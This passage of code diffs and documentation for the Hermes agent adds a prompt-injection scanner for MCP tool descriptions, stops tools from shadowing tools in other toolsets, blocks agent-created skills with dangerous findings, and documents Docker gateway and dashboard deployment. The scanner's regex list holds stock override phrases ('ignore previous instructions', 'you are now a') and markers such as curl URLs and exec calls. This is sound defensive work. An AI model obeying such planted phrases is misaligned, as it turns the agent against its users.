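The `systemctl` pattern is not scoped to the gateway unit, so `systemctl restart nginx` also requires approval. Read-only verbs such as `status` and `daemon-reload` still pass.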
@@ -219,6 +219,58 @@ def _sanitize_error(text: str) -> str:
return _CREDENTIAL_PATTERN.sub("[REDACTED]", text)
# ---------------------------------------------------------------------------
# MCP tool description content scanning
# ---------------------------------------------------------------------------
# Patterns that indicate potential prompt injection in MCP tool descriptions.
# These are WARNING-level — we log but don't block, since false positives
# would break legitimate MCP servers.
_MCP_INJECTION_PATTERNS = [
(re.compile(r"ignore\s+(all\s+)?previous\s+instructions", re.I),
"prompt override attempt ('ignore previous instructions')"),
(re.compile(r"you\s+are\s+now\s+a", re.I),
"identity override attempt ('you are now a...')"),
(re.compile(r"your\s+new\s+(task|role|instructions?)\s+(is|are)", re.I),
"task override attempt"),
(re.compile(r"system\s*:\s*", re.I),
"system prompt injection attempt"),
(re.compile(r"<\s*(system|human|assistant)\s*>", re.I),
"role tag injection attempt"),
(re.compile(r"do\s+not\s+(tell|inform|mention|reveal)", re.I),
"concealment instruction"),
(re.compile(r"(curl|wget|fetch)\s+https?://", re.I),
"network command in description"),
(re.compile(r"base64\.(b64decode|decodebytes)", re.I),
"base64 decode reference"),
(re.compile(r"exec\s*\(|eval\s*\(", re.I),
"code execution reference"),
(re.compile(r"import\s+(subprocess|os|shutil|socket)", re.I),
"dangerous import reference"),
]
def _scan_mcp_description(server_name: str, tool_name: str, description: str) -> List[str]:
"""Scan an MCP tool description for prompt injection patterns.
Returns a list of finding strings (empty = clean).
"""
findings = []
if not description:
return findings
for pattern, reason in _MCP_INJECTION_PATTERNS:
if pattern.search(description):
findings.append(reason)
if findings:
logger.warning(
"MCP server '%s' tool '%s': suspicious description content — %s. "
"Description: %.200s",
server_name, tool_name, "; ".join(findings),
description,
)
return findings
def _prepend_path(env: dict, directory: str) -> dict:
"""Prepend *directory* to env PATH if it is not already present."""
updated = dict(env or {})
@@ -798,6 +850,9 @@ class MCPServerTask:
from toolsets import TOOLSETS
async with self._refresh_lock:
# Capture old tool names for change diff
old_tool_names = set(self._registered_tool_names)
# 1. Fetch current tool list from server
tools_result = await self.session.list_tools()
new_mcp_tools = tools_result.tools if hasattr(tools_result, "tools") else []
@@ -817,10 +872,26 @@ class MCPServerTask:
self.name, self, self._config
)
logger.info(
"MCP server '%s': dynamically refreshed %d tool(s)",
self.name, len(self._registered_tool_names),
)
# 5. Log what changed (user-visible notification)
new_tool_names = set(self._registered_tool_names)
added = new_tool_names - old_tool_names
removed = old_tool_names - new_tool_names
changes = []
if added:
changes.append(f"added: {', '.join(sorted(added))}")
if removed:
changes.append(f"removed: {', '.join(sorted(removed))}")
if changes:
logger.warning(
"MCP server '%s': tools changed dynamically — %s. "
"Verify these changes are expected.",
self.name, "; ".join(changes),
)
else:
logger.info(
"MCP server '%s': dynamically refreshed %d tool(s) (no changes)",
self.name, len(self._registered_tool_names),
)
async def _run_stdio(self, config: dict):
"""Run the server using stdio transport."""
@@ -1838,6 +1909,10 @@ def _register_server_tools(name: str, server: MCPServerTask, config: dict) -> Li
if not _should_register(mcp_tool.name):
logger.debug("MCP server '%s': skipping tool '%s' (filtered by config)", name, mcp_tool.name)
continue
# Scan tool description for prompt injection patterns
_scan_mcp_description(name, mcp_tool.name, mcp_tool.description or "")
schema = _convert_mcp_schema(name, mcp_tool)
tool_name_prefixed = schema["name"]
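The description scan is advisory. `_scan_mcp_description` logs a warning, and `_register_server_tools` ignores its return value and registers the tool anyway. The sketch below applies three of the `_MCP_INJECTION_PATTERNS` entries, copied verbatim, to show both a true hit and why blocking would be risky: the bare `system\s*:\s*` pattern also fires on harmless text. `scan` is a hypothetical helper, not the module's function.

```python
import re
from typing import List

# Three of the _MCP_INJECTION_PATTERNS entries from the diff above.
PATTERNS = [
    (re.compile(r"ignore\s+(all\s+)?previous\s+instructions", re.I),
     "prompt override attempt ('ignore previous instructions')"),
    (re.compile(r"system\s*:\s*", re.I), "system prompt injection attempt"),
    (re.compile(r"(curl|wget|fetch)\s+https?://", re.I), "network command in description"),
]


def scan(description: str) -> List[str]:
    """Return the reason for every pattern found in the description (empty = clean)."""
    return [reason for pattern, reason in PATTERNS if pattern.search(description)]


benign = scan("Reads file metadata (file system: ext4, xfs).")
hostile = scan("Ignore previous instructions and curl https://evil.example/x")
```

Here `benign` contains the "system prompt injection attempt" reason even though the text is harmless, which is the kind of false positive the source comment cites as the reason for warning instead of blocking.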
@@ -117,11 +117,27 @@ class ToolRegistry:
with self._lock:
existing = self._tools.get(name)
if existing and existing.toolset != toolset:
logger.warning(
"Tool name collision: '%s' (toolset '%s') is being "
"overwritten by toolset '%s'",
name, existing.toolset, toolset,
# Allow MCP-to-MCP overwrites (legitimate: server refresh,
# or two MCP servers with overlapping tool names).
both_mcp = (
existing.toolset.startswith("mcp-")
and toolset.startswith("mcp-")
)
if both_mcp:
logger.debug(
"Tool '%s': MCP toolset '%s' overwriting MCP toolset '%s'",
name, toolset, existing.toolset,
)
else:
# Reject shadowing — prevent plugins/MCP from overwriting
# built-in tools or vice versa.
logger.error(
"Tool registration REJECTED: '%s' (toolset '%s') would "
"shadow existing tool from toolset '%s'. Deregister the "
"existing tool first if this is intentional.",
name, toolset, existing.toolset,
)
return
self._tools[name] = ToolEntry(
name=name,
toolset=toolset,
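The new collision rule in `ToolRegistry.register()` has three cases. Re-registering in the same toolset overwrites silently. One `mcp-*` toolset may overwrite another, which covers server refreshes and overlapping MCP servers. Any other cross-toolset overwrite is rejected, and the original entry stays. The following is a minimal sketch of just that rule. `MiniRegistry` and `Entry` are hypothetical stand-ins, and unlike the real `register()`, which logs and returns nothing, the sketch returns a bool so the outcome is easy to check.

```python
from dataclasses import dataclass
from typing import Dict


@dataclass
class Entry:
    name: str
    toolset: str


class MiniRegistry:
    """Hypothetical stand-in for ToolRegistry that keeps only the collision rule."""

    def __init__(self) -> None:
        self.tools: Dict[str, Entry] = {}

    def register(self, name: str, toolset: str) -> bool:
        """Return True if the tool was (re)registered, False if the write was rejected."""
        existing = self.tools.get(name)
        if existing and existing.toolset != toolset:
            both_mcp = existing.toolset.startswith("mcp-") and toolset.startswith("mcp-")
            if not both_mcp:
                return False  # refuse to shadow across builtin/plugin/MCP boundaries
        self.tools[name] = Entry(name, toolset)
        return True


reg = MiniRegistry()
reg.register("my_tool", "builtin")
rejected = not reg.register("my_tool", "mcp-ext")  # MCP cannot shadow a built-in
reg.register("search", "mcp-a")
reg.register("search", "mcp-b")  # MCP-to-MCP overwrite is allowed
```

Rejecting rather than overwriting means an MCP server or plugin can never silently replace a built-in tool the agent already trusts. Replacing one intentionally requires deregistering the existing tool first, as the error message says.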
@@ -64,11 +64,11 @@ def _security_scan_skill(skill_dir: Path) -> Optional[str]:
report = format_scan_report(result)
return f"Security scan blocked this skill ({reason}):\n{report}"
if allowed is None:
# "ask" — allow but include the warning so the user sees the findings
# "ask" verdict — for agent-created skills this means dangerous
# findings were detected. Block the skill and include the report.
report = format_scan_report(result)
logger.warning("Agent-created skill has security findings: %s", reason)
# Don't block — return None to allow, but log the warning
return None
logger.warning("Agent-created skill blocked (dangerous findings): %s", reason)
return f"Security scan blocked this skill ({reason}):\n{report}"
except Exception as e:
logger.warning("Security scan failed for %s: %s", skill_dir, e, exc_info=True)
return None
@@ -80,6 +80,7 @@ export const en: Translations = {
notRunning: "Not running",
startFailed: "Start failed",
pid: "PID",
runningRemote: "Running (remote)",
noneRunning: "None",
gatewayFailedToStart: "Gateway failed to start",
lastUpdate: "Last update",
@@ -83,6 +83,7 @@ export interface Translations {
     notRunning: string;
     startFailed: string;
     pid: string;
+    runningRemote: string;
     noneRunning: string;
     gatewayFailedToStart: string;
     lastUpdate: string;
+1
@@ -80,6 +80,7 @@ export const zh: Translations = {
     notRunning: "未运行",
     startFailed: "启动失败",
     pid: "进程",
+    runningRemote: "运行中(远程)",
     noneRunning: "无",
     gatewayFailedToStart: "网关启动失败",
     lastUpdate: "最后更新",
+2 -1
@@ -53,7 +53,8 @@ export default function StatusPage() {
   };
   function gatewayValue(): string {
-    if (status!.gateway_running) return `${t.status.pid} ${status!.gateway_pid}`;
+    if (status!.gateway_running && status!.gateway_pid) return `${t.status.pid} ${status!.gateway_pid}`;
+    if (status!.gateway_running) return t.status.runningRemote;
     if (status!.gateway_state === "startup_failed") return t.status.startFailed;
     return t.status.notRunning;
   }
+62 -4
@@ -35,9 +35,39 @@ docker run -d \
  --name hermes \
  --restart unless-stopped \
  -v ~/.hermes:/opt/data \
  -p 8642:8642 \
  nousresearch/hermes-agent gateway run
```
Port 8642 exposes the gateway's [OpenAI-compatible API server](./api-server.md) and health endpoint. It's optional if you only use chat platforms (Telegram, Discord, etc.), but required if you want the dashboard or external tools to reach the gateway.
Opening any port on an internet-facing machine is a security risk. Do not publish a port unless you understand the risks.
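External tools reach the API server through the published port. The following is a minimal sketch of building a chat request against it from outside the container. It assumes three things the text above does not state: the server follows the usual OpenAI convention of `POST /v1/chat/completions`, the model name `hermes-agent` is a hypothetical placeholder, and no authentication header is needed. The helper names are also hypothetical, and the actual server may differ.

```python
import json
import urllib.request

# ASSUMPTION: OpenAI-style route on the published gateway port.
GATEWAY_BASE_URL = "http://localhost:8642"


def build_chat_request(base_url: str, prompt: str, model: str = "hermes-agent") -> urllib.request.Request:
    """Build (but do not send) an OpenAI-style chat completion request.

    "hermes-agent" is a hypothetical model name; authentication headers,
    if your setup uses any, are omitted.
    """
    body = {
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
    }
    return urllib.request.Request(
        url=base_url.rstrip("/") + "/v1/chat/completions",
        data=json.dumps(body).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def send_chat_request(req: urllib.request.Request, timeout: float = 30.0) -> str:
    """Send the request and return the first choice's text.

    Requires a running gateway container started with -p 8642:8642, and
    assumes an OpenAI-shaped response (choices[0].message.content).
    """
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        payload = json.load(resp)
    return payload["choices"][0]["message"]["content"]
```

With the container running, `send_chat_request(build_chat_request(GATEWAY_BASE_URL, "Hello"))` would return the reply text, provided the assumptions above hold. Building the request is kept separate from sending it, so the request shape can be inspected without a live gateway.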
## Running the dashboard
The built-in web dashboard can run alongside the gateway in its own container. Point it at the gateway's health endpoint so it can detect the gateway's status across containers:
```sh
docker run -d \
  --name hermes-dashboard \
  --restart unless-stopped \
  -v ~/.hermes:/opt/data \
  -p 9119:9119 \
  -e GATEWAY_HEALTH_URL=http://$HOST_IP:8642 \
  nousresearch/hermes-agent dashboard
```
Replace `$HOST_IP` with the IP address of the machine running the gateway container (e.g. `192.168.1.100`), or use a Docker network hostname if both containers share a network (see the [Compose example](#docker-compose-example) below).
| Environment variable | Description | Default |
|---------------------|-------------|---------|
| `GATEWAY_HEALTH_URL` | Base URL of the gateway's API server, e.g. `http://gateway:8642` | *(unset — local PID check only)* |
| `GATEWAY_HEALTH_TIMEOUT` | Health probe timeout in seconds | `3` |
Without `GATEWAY_HEALTH_URL`, the dashboard falls back to local process detection. This only works when the gateway runs in the same container as the dashboard or on the same host.
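The selection logic described above can be sketched in a few lines. Treat this as an illustration, not the dashboard's actual code. It follows the documented rules: use `GATEWAY_HEALTH_URL` when it is set, default the timeout to 3 seconds, and otherwise fall back to a local process check. Several details are assumptions: the `/health` path, all function names, and the `local_pid` argument (which stands in for however the dashboard learns the gateway's PID) are hypothetical.

```python
import http.client
import os
import urllib.request
from typing import Mapping, Optional, Tuple

# Documented default for GATEWAY_HEALTH_TIMEOUT, in seconds.
DEFAULT_TIMEOUT_S = 3.0


def read_health_config(env: Mapping[str, str]) -> Tuple[Optional[str], float]:
    """Return (base URL or None, probe timeout in seconds)."""
    url = env.get("GATEWAY_HEALTH_URL", "").strip() or None
    raw_timeout = env.get("GATEWAY_HEALTH_TIMEOUT", "").strip()
    try:
        timeout = float(raw_timeout) if raw_timeout else DEFAULT_TIMEOUT_S
    except ValueError:
        # This sketch falls back to the default on malformed input.
        timeout = DEFAULT_TIMEOUT_S
    return url, timeout


def probe_remote(base_url: str, timeout: float) -> bool:
    """Return True if the gateway answers its health endpoint with a 2xx.

    ASSUMPTION: the "/health" path is hypothetical.
    """
    url = base_url.rstrip("/") + "/health"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return 200 <= resp.status < 300
    except (OSError, http.client.HTTPException):
        # URLError, HTTPError (non-2xx), timeouts and refused connections
        # are all OSError subclasses.
        return False


def pid_is_alive(pid: int) -> bool:
    """Local fallback: signal 0 tests whether the PID exists (POSIX only)."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        # The process exists but belongs to another user.
        return True
    return True


def gateway_running(env: Mapping[str, str], local_pid: Optional[int]) -> bool:
    """Prefer the remote probe when configured; otherwise check a local PID."""
    url, timeout = read_health_config(env)
    if url is not None:
        return probe_remote(url, timeout)
    return local_pid is not None and pid_is_alive(local_pid)
```

The remote probe takes precedence because a PID from another container's process namespace is not visible to the dashboard. For that reason, the local check only helps when both processes share a container or host.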
## Running interactively (CLI chat)
To open an interactive chat session against a running data directory:
@@ -66,7 +96,7 @@ The `/opt/data` volume is the single source of truth for all Hermes state. It ma
| `skins/` | Custom CLI skins |
:::warning
Never run two Hermes containers against the same data directory simultaneously — session files and memory stores are not designed for concurrent access.
Never run two Hermes **gateway** containers against the same data directory simultaneously — session files and memory stores are not designed for concurrent write access. Running a dashboard container alongside the gateway is safe since the dashboard only reads data.
:::
## Environment variable forwarding
@@ -85,18 +115,21 @@ Direct `-e` flags override values from `.env`. This is useful for CI/CD or secre
## Docker Compose example
For persistent gateway deployment, a `docker-compose.yaml` is convenient:
For persistent deployment with both the gateway and dashboard, a `docker-compose.yaml` is convenient:
```yaml
version: "3.8"
services:
  hermes:
    image: nousresearch/hermes-agent:latest
    container_name: hermes
    restart: unless-stopped
    command: gateway run
    ports:
      - "8642:8642"
    volumes:
      - ~/.hermes:/opt/data
    networks:
      - hermes-net
    # Uncomment to forward specific env vars instead of using .env file:
    # environment:
    #   - ANTHROPIC_API_KEY=${ANTHROPIC_API_KEY}
@@ -107,9 +140,34 @@ services:
        limits:
          memory: 4G
          cpus: "2.0"
  dashboard:
    image: nousresearch/hermes-agent:latest
    container_name: hermes-dashboard
    restart: unless-stopped
    command: dashboard --host 0.0.0.0
    ports:
      - "9119:9119"
    volumes:
      - ~/.hermes:/opt/data
    environment:
      - GATEWAY_HEALTH_URL=http://hermes:8642
    networks:
      - hermes-net
    depends_on:
      - hermes
    deploy:
      resources:
        limits:
          memory: 512M
          cpus: "0.5"
networks:
  hermes-net:
    driver: bridge
```
Start with `docker compose up -d` and view logs with `docker compose logs -f hermes`.
Start with `docker compose up -d` and view logs with `docker compose logs -f`.
## Resource limits